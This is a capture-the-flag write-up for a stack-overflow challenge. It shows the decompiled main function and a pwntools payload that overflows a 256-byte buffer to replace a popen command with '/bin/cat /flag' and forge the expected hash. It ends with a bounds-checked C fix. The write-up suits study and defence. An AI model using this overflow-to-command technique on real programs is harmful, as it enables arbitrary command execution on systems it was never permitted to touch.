[BMZCTF-pwn] 20-secret_ file
2022-07-03 04:30:00 【Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi】
A stack overflow problem.
Once you have read through the program, the solution is straightforward.
__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char *v3; // rax
  unsigned __int8 *v4; // rbp
  char *v5; // rbx
  __int64 v6; // rcx
  char *v7; // rdi
  unsigned int v8; // er12
  FILE *v9; // rbp
  size_t v11; // [rsp+0h] [rbp-308h] BYREF
  char *lineptr; // [rsp+8h] [rbp-300h] BYREF
  char dest[256]; // [rsp+10h] [rbp-2F8h] BYREF  user input: the plaintext to be encrypted
  char v14[27]; // [rsp+110h] [rbp-1F8h] BYREF  the command, placed here at initialization
  char v15[65]; // [rsp+12Bh] [rbp-1DDh] BYREF  the sha256 value, placed here at initialization
  _QWORD v16[4]; // [rsp+16Ch] [rbp-19Ch] BYREF
  char v17[64]; // [rsp+18Ch] [rbp-17Ch] BYREF  sha256 value of the first 0x100 bytes of user input
  int v18; // [rsp+1CCh] [rbp-13Ch] BYREF
  char s[264]; // [rsp+1D0h] [rbp-138h] BYREF
  unsigned __int64 v20; // [rsp+2D8h] [rbp-30h]

  v20 = __readfsqword(0x28u);
  sub_E60(dest); // initialization: command into v14, hash value into v15
  v11 = 0LL;
  lineptr = 0LL;
  if ( getline(&lineptr, &v11, stdin) == -1 )
    return 1;
  v3 = strrchr(lineptr, 10);
  if ( !v3 )
    return 1;
  *v3 = 0;
  v4 = (unsigned __int8 *)v16;
  v5 = v17;
  strcpy(dest, lineptr); // unbounded copy into the 256-byte dest
  sub_DD0((__int64)dest, v16, 0x100u); // encrypts the first 0x100 bytes of the string
  do
  {
    v6 = *v4;
    v7 = v5;
    v5 += 2;
    ++v4;
    snprintf(v7, 3uLL, "%02x", v6); // hex-encode the result into v17
  }
  while ( v5 != (char *)&v18 );
  v8 = strcmp(v15, v17);
  if ( v8 )
  {
    puts("wrong password!");
    return 1;
  }
  v9 = popen(v14, "r");
  if ( !v9 )
    return 1;
  while ( fgets(s, 256, v9) )
    printf("%s", s);
  fclose(v9);
  return v8;
}
The program first stores a command and the expected hash value in v14 and v15. The user's input is then copied into dest, which sits directly before v14. Because the copy is unbounded, a sufficiently long input overwrites v14 and v15.
from pwn import *
p = process('./pwn')
elf = ELF('./pwn')
context(arch = 'amd64', log_level = 'debug')
# 256 bytes fill dest, the next 27 bytes land in v14 (command), the last 64 bytes land in v15 (hash)
payload = b'A'*(256)+ b'/bin/cat /flag;'.ljust(27, b'#')+b'e075f2f51cad23d0537186cfcd50f911ea954f9c2e32a437f45327f1b7899bbb'
p.sendline(payload)
p.recv()
pause()
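The defensive side of the overflow described above, as an added example (not code from the challenge binary or the original post): the struct mirrors the decompiled stack layout, fields_touched reports which trusted buffers an unchecked copy would reach, and copy_line_checked is a bounds-checked replacement for the strcpy. The names frame, fields_touched, copy_line_checked and the placeholder strings are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Mirrors the decompiled layout: dest at rsp+0x10, v14 at rsp+0x110, v15 at rsp+0x12B. */
struct frame {
    char dest[256];  /* user input */
    char cmd[27];    /* v14: command later passed to popen() */
    char hash[65];   /* v15: expected digest, 64 hex chars + NUL */
};

enum { TOUCH_NONE = 0, TOUCH_CMD = 1, TOUCH_HASH = 2 };

/* Which trusted fields an unchecked strcpy of `len` bytes plus its
 * terminating NUL would write over (hypothetical helper). */
int fields_touched(size_t len)
{
    size_t end = len + 1;   /* bytes written, counted from dest[0] */
    int mask = TOUCH_NONE;
    if (end > offsetof(struct frame, cmd))  mask |= TOUCH_CMD;
    if (end > offsetof(struct frame, hash)) mask |= TOUCH_HASH;
    return mask;
}

/* Hardened replacement for strcpy(dest, lineptr): reject over-long input
 * instead of truncating it, so cmd and hash are never written from input. */
int copy_line_checked(struct frame *f, const char *line)
{
    size_t len = strlen(line);
    if (len >= sizeof f->dest)
        return -1;
    memcpy(f->dest, line, len + 1);
    return 0;
}

int main(void)
{
    struct frame f;
    char big[347];   /* constructed input: 346 filler bytes + NUL */
    memset(&f, 0, sizeof f);
    strcpy(f.cmd, "CMD-PLACEHOLDER");   /* constructed; the real value is set by sub_E60 */
    strcpy(f.hash, "HASH-PLACEHOLDER"); /* constructed */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("unchecked copy would touch mask=%d\n", fields_touched(strlen(big)));
    printf("checked copy returns %d, cmd is \"%s\"\n", copy_line_checked(&f, big), f.cmd);
    return 0;
}
```

Even one byte past the buffer matters here: a 256-byte line makes the terminating NUL land on the first byte of the command.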